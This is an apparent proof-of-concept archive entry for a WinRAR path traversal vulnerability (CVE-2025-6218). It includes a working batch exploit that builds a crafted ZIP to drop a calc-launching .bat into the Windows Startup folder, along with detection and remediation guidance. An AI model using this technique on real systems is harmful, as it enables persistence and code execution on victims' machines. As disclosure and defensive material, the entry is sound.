PoC Archive PoC Archive
High CVE-2025-6218 unpatched

WinRAR Archive Extraction Path Traversal (CVE-2025-6218)

by skimask1690 · 2026-05-15

Severity
High
CVE
CVE-2025-6218
Category
misc
Affected product
WinRAR archive extraction workflow
Affected versions
WinRAR 7.11 and earlier
Disclosed
2026-05-15
Patch status
unpatched

Metadata

FieldValue
Date Added2026-05-15
Author / Researcherskimask1690
CVE / AdvisoryCVE-2025-6218
Categorymisc
SeverityHigh
CVSS ScoreN/A
StatusWeaponized
Tagspath-traversal, arbitrary-file-write, startup-folder, WinRAR, Windows, user-interaction
RelatedN/A

Affected Target

FieldValue
Software / SystemWinRAR archive extraction workflow
Versions AffectedWinRAR 7.11 and earlier
Language / PlatformBatch / Windows
Authentication RequiredPartial (user interaction required)
Network Access RequiredLocal only

Summary

This PoC demonstrates CVE-2025-6218 in WinRAR, where a crafted archive extraction path can place files outside the intended destination directory. The provided batch script builds a ZIP archive that writes a .bat file into the current user’s Startup folder. On vulnerable versions, extracting this archive via WinRAR’s extraction flow can lead to code execution on next logon.


Vulnerability Details

Root Cause

WinRAR path handling in the vulnerable extraction workflow allows traversal-like path placement during archive extraction, enabling attacker-controlled file write to sensitive user-writable locations such as Startup.

Attack Vector

An attacker prepares a crafted archive and delivers it to a target user. The user opens the archive with WinRAR and extracts it using the indicated extraction option. The extracted payload lands in the Startup folder.

Impact

Arbitrary file write to Startup can be abused for persistence and execution of attacker-controlled commands when the user logs in, resulting in local code execution in the victim user context.


Environment / Lab Setup

OS:          Windows
Target:      WinRAR 7.11 or earlier
Attacker:    Authorized security tester
Tools:       WinRAR (default install path), cmd.exe

Setup Steps


Proof of Concept

Step-by-Step Reproduction

  1. Generate crafted archive by running the batch script.

    1
    
    exploit.bat
    
  2. Extract in vulnerable WinRAR flow by right-clicking the ZIP, opening with WinRAR, and using **Extract to {folder}**.

  3. Verify Startup drop at:

    1
    
    %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
    
  4. Log off/on and observe calc.exe execution from Startup payload.

Exploit Code

See exploit.bat in this folder.

1
2
3
@echo off
echo calc.exe > POC.bat
"C:\Program Files\WinRAR\WinRAR.exe" a -ap" \.. \.. \.. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" %~dp0CVE-2025-6218.zip POC.bat

Expected Output

[+] CVE-2025-6218.zip created successfully!

Screenshots / Evidence

  • screenshots/ — add authorized lab screenshots showing Startup file placement and post-login execution.

Detection & Indicators of Compromise

- Unexpected .bat/.cmd files written to user Startup folders after archive extraction
- WinRAR extraction activity followed by new persistence artifacts in Startup
- Unexpected calculator or command execution at user logon

SIEM / IDS Rule (example):

Detect archive extraction process chain where WinRAR writes files under
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

Remediation

ActionDetail
PatchUpgrade WinRAR to 7.12 or later
WorkaroundAvoid extracting untrusted archives; disable automatic Startup execution monitoring exceptions
Config HardeningMonitor and alert on new files in Startup folders and restrict untrusted archive handling

References


Notes

Auto-ingested from https://github.com/skimask1690/CVE-2025-6218-POC on 2026-05-15.

exploit.bat
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
REM Authorized security research and testing only.
@echo off
title CVE-2025-6218 POC

echo calc.exe > POC.bat

:: Assumes that two directories up from the current working directory corresponds to the user's home directory (%USERPROFILE%)
"C:\Program Files\WinRAR\WinRAR.exe" a -ap" \.. \.. \.. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" %~dp0CVE-2025-6218.zip POC.bat

echo.
if errorlevel 1 (
    echo [!] Failed to create POC.
) else (
    echo [+] CVE-2025-6218.zip created successfully!
)
echo.

del POC.bat

pause